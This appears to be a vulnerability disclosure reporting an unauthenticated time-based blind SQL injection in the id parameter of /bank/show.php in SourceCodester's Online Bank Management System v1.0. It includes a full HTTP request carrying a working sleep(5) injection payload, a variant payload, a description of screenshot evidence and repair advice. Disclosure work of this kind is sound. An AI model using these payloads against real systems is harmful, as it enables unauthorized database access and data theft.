SourceCodester - Online Bank Management System V1.0 SQL injection #7
Description
NAME OF AFFECTED PRODUCT(S)
- SourceCodester
Vendor Homepage
submitter
- Wong Chun Wing
Vulnerable File
- GET /bank/show.php
VERSION(S)
- v1.0
Software Link
PROBLEM TYPE
Vulnerability Type
- SQL injection
Root Cause
- An unauthenticated SQL Injection vulnerability was identified in the id parameter of the /bank/show.php endpoint. The application does not properly validate this parameter, allowing an attacker to manipulate database queries by sending a crafted GET request. This can be verified using a tool like SQLMAP, and successful exploitation could lead to the unauthorized disclosure of sensitive database information.
Impact
-
Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
Vulnerability details and POC
Vulnerability location:
- GET /bank/show.php?id=
Payload:
Parameter:
show.php (GET) with id parameter
Payload:
GET /bank/show.php?id=5'and(select*from(select/**/sleep(5))a/**/union/**/select+1)=' HTTP/1.1
Host: 127.0.0.1:82
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
sec-ch-ua: "Chromium";v="127", "Not)A;Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
The following are screenshots for POC:
The request pane displays an HTTP GET request sent to the /bank/show.php endpoint. The attacker has manipulated the id parameter with a specific payload: id=0'//union//select(select(sleep(5))),a'--+.
The most important part of this payload is sleep(5). This is a command that instructs the backend database to pause its processing for exactly 5 seconds before continuing.
The right pane shows the server's response. While the server sends a 302 redirect to login.php, the critical piece of evidence is at the bottom right corner of the screen: the response time.
The request took 5,017 milliseconds (approximately 5 seconds) to complete.
The 5-second delay in the server's response directly matches the sleep(5) command in the attack payload. This is conclusive proof that the database executed the attacker's injected SQL code, confirming that the id parameter is vulnerable to a time-based blind SQL Injection attack.
Suggested repair
-
Use prepared statements and parameter binding:
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. -
Input validation and filtering:
Strictly validate and filter user input data to ensure it conforms to the expected format. -
Minimize database user permissions:
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. -
Regular security audits:
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.